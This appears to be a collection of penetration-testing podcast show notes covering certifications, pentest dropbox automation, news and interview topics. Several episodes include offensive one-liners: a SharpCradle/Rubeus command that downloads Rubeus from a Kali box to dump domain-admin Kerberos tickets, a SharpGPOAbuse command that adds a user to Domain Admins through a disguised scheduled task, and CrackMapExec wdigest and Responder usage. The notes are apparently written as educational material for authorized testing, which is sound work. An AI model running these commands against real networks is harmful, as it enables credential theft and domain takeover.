    Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on:

    • The Fargo TV series
    • Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS
    • This Key and Peele sketch
    • I just took my CRTP exam, which we've talked about a lot in the past
    • 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

    7MS #451: Deep Freeze Jan 22, 2021

    Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore!

    Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)


    7MS #450: DIY Pentest Dropbox Tips - part 4 Jan 15, 2021

    Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands:

    tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build

    powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep

    Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster!

    Don't like it that Server Manager loves to rear its dumb head upon every login? Kill the task for it with Get-ScheduledTask -TaskName ServerManager | Disable-ScheduledTask -Verbose. Byeeeeee!!!!

    I love Chrome more than I love IE/Edge, so I auto install it with:

    $Path = $env:TEMP; $Installer = "chrome_installer.exe"; Invoke-WebRequest "http://dl.google.com/chrome/install/375.126/chrome_installer.exe" -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait; Remove-Item $Path\$Installer

    Now get all the Windows updates!

    Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot

    Then rename your machine:

    Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!"

    When you're ready to install Active Directory, you can grab the RSAT tools:

    Write-Host "Lets install the RSAT tooleeeage!" add-windowsfeature -name rsat-adds

    And then the AD domain services themselves:

    Write-Host "Now lets install the AD domain services!" add-windowsfeature ad-domain-services

    Then install the new forest:

    install-addsforest -domainname your.domain -installdns -DomainNetbiosName yourdomain

    7MS #449: DIY Pentest Dropbox Tips - Part 3 Jan 07, 2021

    Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen:

    Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds.

    Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like the Windows equivalent of an answer file). The area of preseed.cfg I've been spending hours dorking around with is:

    d-i preseed/late_command string \

    Under this section you can customize things to your heart's content. For example, you could automatically pull down and install all OS packages/updates and a bunch of third party utils you want:

    in-target sh -c 'apt-get update'; \ in-target sh -c 'apt-get upgrade -y'; \ in-target sh -c 'apt-get install curl dnsrecon git net-tools nmap openssh-server open-vm-tools-desktop python3.8 python3-pip python-libpcap ubuntu-gnome-desktop unzip wget xsltproc -y'; \

    Finally, the project provides a slick script that will wrap up your Ubuntu build plus an SSH key into a ready-to-go ISO:

    build-iso.sh ~/.ssh/id_rsa.pub ~/Desktop/My-kool-kustomized-Ubuntu.iso

    Awesome!

    Kali VMs There is some decent documentation on building a preseed.cfg file for Kali. But the best resource I found with some excellent prebuilt config file is this kali-preseed project.

    Once your seed file is built, it's super easy to simply host it on a machine in your network and let Kali pull it during install. For example, if you've got a Linux box with Python on the network at 192.168.0.7, just make a temporary folder with the preseed.cfg file in it and then run:

    sudo python3 -m http.server 80

    Then, in your virtual environment, create a new VM and boot it to a Kali NetInstaller image. At the splash screen, hit Tab and it'll display a command line you can edit. Remove the line that says something like preseed/file=/cdrom/simple-cdd/default.preseed, add auto=true and then the URL path to your preseed file, such as url=http://192.168.0.7/preseed.cfg. The Kali will ask for a few questions, such as a username and hostname to configure, and then if you're watching your machine hosting preseed.cfg, you'll see your Kali machine grab the config file and take care of the rest from there!

    Got a better/cooler/funner/faster/awesomer way to do this type of automation? Let us know!


    7MS #448: Certified Red Team Professional - Part 3 Dec 30, 2020

    Today, Gh0sthax and I talk about week 3/4 of the CRTP - Certified Red Team Professional training, and how it's kicking our butts a bit. Key points include:

    • We agree this is not a certification for folks who are new to pentesting

    • Don't expect to be following along "live" with the instructor during the training sessions

    • You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions

    • As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel

    • Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewalll config!

    • The more PowerShell skills you can walk into this training with, the better.

    • We've got to play with some tools that were new(ish) to us:

      • PowerUpSQL - check out these awesome cheat sheets too!
      • HeidiSQL
      • Rubeus
    • If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam!

    • Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective!

    • A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.


    7MS #447: Cyber News - The End of 2020 as We Know It Edition Dec 23, 2020

    Merry Christmas! Happy holidays! Please enjoy the last cyber news edition of 2020, brought to us by our good pal Gh0stHax. Stories covered include:

    • You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details.

    • Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats

    • CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!


    7MS #446: Certified Red Team Professional - Part 2 Dec 17, 2020

    Today's episode continues part 1 of our series on the Certified Red Team Professional certification. Key points from today's episode include:

    • It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources

    • Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts.

    • Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh.

    • Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this. It looks awesome. And the devs of the tool have a video on it here.

    • When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.


    7MS #445: Certified Red Team Professional Dec 09, 2020

    Welp, I need another certification like I need a hole in the head, but that didn't stop me from signing up for the Certified Red Team Professional. So I've started a series on sharing what I'm learning as I proceed through the certification path. (We're also talking about this on the 7MS forums)

    Here are some of the highlights from week 1:

    • Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module

    • I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps.

    • When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before:

      • HFS - simple HTTP file server
      • Powercat - for catching shells!

    Then on a personal front, I have a few updates to share as well:

    • The Thanksgiving surprise that brought tears to my eyes

    • The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag

    • A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break


    7MS #444: Interview with Christopher Fielder of Arctic Wolf Dec 02, 2020

    Happy December! Today I virtually sat down with Christopher Fielder of Arctic Wolf, who started his career in security at 18 (I was just playing a lot of video games when I was that old)! Christopher has served in the Air Force, worked for a university and SANS, served for some three-letter organizations - and more!

    Christopher and I had a great chat about a variety of security topics, including:

    • Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team

    • Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there

    • Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!


    7MS #443: Cyber News - Thankful for Patches Edition Nov 26, 2020

    Happy Thanksgiving! While the turkey and pie settle in your belly, why not also digest some fantastic security news stories with our pal Gh0sthax?

    Today's stories include:

    • It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know.

    • We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked.

    • Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes.

    • As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.


    7MS #442: Tales of Internal Network Pentest Pwnage - Part 23 Nov 19, 2020

    Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

    • Great blue team tools alerting our customer to a lot of the stuff we were doing
    • An EDR that we tried to beat up (but it beat us up instead)
    • SharpGPOAbuse which we talked about extensively last week
    • Separation of "everyday" accounts from privileged accounts
    • Multi-factor authentication bypass!
    • Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

    The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

    SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

    This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

    echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb

    Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight.

    We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!


    7MS #441: SharpGPOAbuse Nov 15, 2020

    Hello friends! Sorry to be late with this episode (again) but we've been heads-down in a lot of cool security work, coming up for air when we can! Today's episode features:

    • A little welcome music that is not the usual scatting of gibberish I torture you with

    • Some cool tools I'm playing with in the lab that we'll do future episodes on in the future:

      • DetectionLab to practice detecting all the bad things!
      • BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want.
      • Cobalt Strike - we're doing a demo right now!

    Most of today's episode focuses on SharpGPOAbuse, a tool that can be used to abuse "generic write" access to GPOs (which you might identify after running BloodHound). Here's a sample syntax you could run:

    SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD DOMAIN" --GPOName "Name of GPO with Generic Write Access"

    This will push a ScheduledTasks.xml file to \\sample.company\Policies\LONG-STRING-REPRESENTING-THE-GPO-ID\User\Preferences\ScheduledTasks

    Now if you find that the task is not pushing correctly, it may be that SharpGPOAbuse.exe hasn't been able to update either the GPT.INI file (in the root of the GPO path) and/or the versionNumber value assigned to the GPO itself. If you need to adjust the versionNumber and GPT.INI value manually, definitely read this Microsoft article so you know how the number is generated and how to increment it properly. This flippin' sweet RastaMouse blog article also helped this click for me.

    If you can't seem to update versionNumber using the PowerShell in Rasta's article, you can also open up ADSI Edit and navigate to Default naming context > DC=your,DC=com > CN=System > CN=Policies > CN=LONG-STRING-REPRESENTING-THE-GPO-ID then get the properties of the folder, scroll down and manually adjust the value for versionNumber.


    7MS #440: Tales of Internal Network Pentest Pwnage - Part 22 Nov 08, 2020

    Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include:

    • We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender!

    • Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more!

    • Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts

    • Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!


    7MS #439: Cyber News - Ransomware is Definitely Still a Thing Edition Oct 29, 2020

    Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of certs, 7MS is now PCIP certified!

    Today's great cyber stories include:

    • Azure AD is a single point of failure in many networks

    • Ransomware sophistication continues to grow - as demonstrated in this story, this one and this one

    • Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less

    • Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-)

    P.S. We've got a Halloween Webinar coming up Friday with our friends at Netwrix - sign up and we'll see you there!


    7MS #438: PCI Professional Certification (PCIP) - Part 4 Oct 21, 2020

    Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover:

    Study materials that helped me prepare:

    • PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!)
    • Flashcards from Cram
    • Flashcards from Quizlet
    • My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested)
    • Flashcards from ProProfs
    • Documentation from PCI Web site itself - specifically the glossary, quick reference guide and my personal favorite, the prioritized approach guidance

    I also talk about taking the exam from home which was an interesting experience (as well as a privacy/security mini nightmare!).


    7MS #437: Homecoming and Home ioT Security - Part 3 Oct 14, 2020

    Hello! This episode is a true homecoming in that I actually recorded it from home. Yay!

    WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!!

    With that said, I wanted to follow up on part 1 and 2 of this series and share some additional cool tools that others have told me about in regards to securing and monitoring all your ioTs!

    • Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack) says this video demonstrates why he really loves it.

    • Prometheus, recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory.

    The final thing we talk about today is trying to answer this question: with so many of my ioTs tied to some cloud app/service, how do I keep these accounts themselves as secure as possible?

    Songs sung in this episode include:

    • Follow Through by Gavin DeGraw
    • Livin' on a Prayer
    • The Look that Says You Love Me (Brian Johnson)
    • Goodness of God

    7MS #436: Cleaning Up Your Cloud Clutter Oct 07, 2020

    Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cleaning up my cloud clutter - cloud services, email, file sharing, etc. - in an effort to be more secure and have a reduced digital footprint. Today's tips include:

    • Double-check that any device you have that supports full-disk encryption has it enabled

    • On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years)

    • Got old PCs sitting around you're not using? Nuke 'em with DBAN.

    • Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!)

    • Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage

    • Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly

    • Handling password hashes? Here's one way to setup an encrypted partition for them

    • You can clean old email from Gmail quickly using some simple searches. You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird


    7MS #435: Homecoming and Home ioT Security - Part 2 Oct 02, 2020

    Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions you can use to keep tabs on your ioT network (or any network, really):

    • Nagios - it's old school but gets the job done. This article helped me get it going on an RPi.

    • SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor

    • PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!


    7MS #434: Homecoming and Home ioT Security Oct 01, 2020

    WE'RE HOME! After almost a year after our fire, we're back, baby!

    This episode is somewhat of a homecoming that dovetails into an episode about ioT security. I've basically done a 180 degree spin on ioT stuff. I now love the coolness and convenience of these things while simultaneously being terrified of the security risks. Is there a happy balance somewhere between the two? Maybe. Today we dive into ioT security, specifically:

    • Setting up a ioT dedicated wireless network
    • Quarantining it so it can only talk to the Internet
    • Poking holes in the firewall to allow ioT DNS requests to be captured
    • Scanning your ioT for services and potential default/weak cred use

    7MS #433: Cyber News - Security Skills Gap Edition Sep 23, 2020

    Hi! Today our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax has prepared some cyber-licious actionable news stories for us to chew on. Today's stories include:

    • Cybersecurity skills gap (powered by lack of career development!)

    • Which cyber jobs are hot - or not?

    • Mysterious wave of DDoS attacks

    • The Magecart threat group pwns thousands of ecommerce sites

    On a parting note, don't forget to patch your DCs against Zerologon! Here's a great Twitter thread breakdown that explains it in more detail


    7MS #432: Tales of Internal Network Pentest Pwnage - Part 21 Sep 16, 2020

    Yay! It's time for another tale of pentest pwnage! Highlights include:

    • Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.

    • Why lsassy is my new best friend.

    • I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:

    sudo apt-get update sudo apt-get upgrade -y sudo apt-get install openssh-server -y sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y #Aha helps take output from testssl.sh and make it nice and HTML-y sudo git clone https://github.com/theZiz/aha.git /opt/aha #Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need! sudo git clone https://github.com/leonjza/awesome-nmap-grep.git /opt/awesome-nmap-grep #bpatty is...well...bpatty! sudo git clone https://github.com/braimee/bpatty.git /opt/bpatty #CrackMapExec is...awesome sudo mkdir /opt/cme cd /opt/cme sudo curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.1.0dev/cme-ubuntu-latest.1.zip -L -o cme.zip sudo unzip cme.zip sudo chmod +x ./cme #eyewitness is a nice recon tool for putting some great visualization behind nmap scans sudo git clone https://github.com/FortyNorthSecurity/EyeWitness.git /opt/eyewitness cd /opt/eyewitness/Python/setup sudo ./setup.sh #impacket is "a collection of Python classes for working with network protocols" #I currently primarily use it for ntlmrelayx.py sudo git clone https://github.com/CoreSecurity/impacket.git /opt/impacket cd /opt/impacket sudo pip3 install . #mitm6 is a way to tinker with ip6 and get around some ip4-level protections sudo git clone https://github.com/fox-it/mitm6.git /opt/mitm6 cd /opt/mitm6 sudo pip3 install -r requirements.txt # install service-identity sudo pip3 install service-identity # lsassy sudo python3 -m pip install lsassy #nmap-bootstrap-xsl turns nmap scan output into pretty HTML sudo git clone https://github.com/honze-net/nmap-bootstrap-xsl.git /opt/nmap-bootstrap-xsl #netcreds "Sniffs sensitive data from interface or pcap" sudo git clone https://github.com/DanMcInerney/net-creds /opt/netcreds #PCCredz parses pcaps for sensitive data sudo git clone https://github.com/lgandx/PCredz /opt/pcredz #Powersploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment" sudo git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit #PowerupSQL is a tool for discovering, enumerating and potentially pwning SQL servers! sudo git clone https://github.com/NetSPI/PowerUpSQL.git /opt/powerupsql #responder is awesome for LLMNR, NBT-NS and MDNS poisoning sudo git clone https://github.com/lgandx/Responder.git /opt/responder

    7MS #431: How to Succeed in Business Without Really Crying - Part 8 Sep 09, 2020

    Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall:

    • 7MS hired a VP of sales and marketing: Clyde Cooper!
    • We've added some new tools to our tools/services gist:
      • Having a true sales force for the first time has prompted us to invest in Salesforce. There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)
      • We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
    • Recording an "about us" video with a production company is exciting, stressful and awkward
    • Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives
    • For really no reason at all, I sing for you a bit in this episode
      • On that note, I absolutely love this song. I feel like it's my family's theme song for the last year.

    7MS #430: Interview with Dan DeCloss Sep 02, 2020

    Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's upcoming Webinar about runbooks on September 9!). We also did a PlexTrac 101 Webinar with them recently!

    You may remember Dan from such podcasts as this one when we first talked to him in 2019. Dan and I have a lot in common in that we both started security companies about the same time, so I had a lot of questions for Dan around how business has been going since we last talked on the podcast. Today our topics/questions include:

    • What are the (good) warning signs that a passion project you have could be a viable business?

    • Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-)

    • At what point does a side project have to become what you do for your day job?

    • How do you safely prepare to quit a comfortable corporate life to life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two?

    • How important is it to have the support of your friends/family when starting a new biz?

    • Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)?

    • When is it time to hire additional resources or raise additional money to support your growing business?

    • What marketing efforts are fruitful for a new security biz to spend time/money on?

    • How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both?

    • What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)


    7MS #429: Cyber News - Free Bitcoin for Everybody Edition Aug 26, 2020

    Hola! We're back again with our amigo Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

    • The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost

    • Garmin's personal and painful experience with ransomware

    • Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware

    • Are we ready to endure a cyber crisis?

    • Would you fall for this social engineering attack?


    7MS #428: Tales of Internal Network Pentest Pwnage - Part 20 Aug 19, 2020

    Welcome to another fun tale of internal pentest pwnage! Today's tale includes these helpful informational tidbits:

    • My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!)

    • PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings.

    • eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more.

    I've also got some personal updates for you, including:

    • House updates
    • Fighting with the man/woman upstairs
    • My worst Webinar nightmare came true
    • A socially distanced wedding singing experience

    7MS #427: Interview with Ameesh Divatia from Baffle Aug 12, 2020

    Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:

    Misconfigured cloud databases

    • Why is this such a common issue, and how can we address it?
    • Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
    • What tools can we use to better secure our cloud databases?
    • How can we secure sensitive information as we migrate it from LAN side to the cloud?

    CCPA (California Consumer Privacy Act)

    • What is the CCPA? How does it relate to GDPR?
    • If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know?
    • Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
    • Does CCPA only apply to California residents and companies?

    Secure data sharing

    • What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns?

    • What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?

    • What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?


    7MS #426: Tales of Internal Pentest Pwnage - Part 19 Aug 07, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense.

    We've got another swell tale of internal pentest pwnage for you today! Highlights include:

    • If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes!

    • Here's one way you can grab the latest CME binary:

    curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

    Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different:

    cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable
    • If you're looking to block IPv6 (ab)use in your environment, this article has some great tips.

    • When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team

    • Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.

    • A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to.

    • I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more!

    • Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.


    7MS #425: DIY Pentest Dropbox Tips - Part 2 Jul 30, 2020

    Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said:

    For the Windows VM
    • Turn on RDP with PowerShell:
    Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    • Change time zone with command line:
    tzutil /s "Central Standard Time"
    • Install Chrome with PowerShell:
    $LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound)
    • Install PowerUpSQL:
    Install-Module -Name PowerUpSQL
    • Turn off sleepy time:
    powercfg.exe -change -standby-timeout-ac 0
    • Install DotNet 3.5:
    dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM
    • Refresh the SSH keys:
    apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service
    • Get SharpHound and Mimikatz:
    wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe
    • Install pypykatz
    sudo pip3 install pypykatz
    • Install CrackMapExec binaries (which at time of this publication is this one):
    curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

    7MS #424: Cyber News - Everything is Pwned Edition Jul 22, 2020

    Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

    • Hackers are trying to steal admin passwords from F5 devices
    • Secret service reports increase in hacked MSPs
    • Most Popular Home Routers Have ‘Critical’ Flaws
    • "Sigred" DNS vulnerability in Microsoft DNS

    7MS #423: Tales of Internal Pentest Pwnage - Part 18 Jul 15, 2020

    This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

    • Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
    • Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
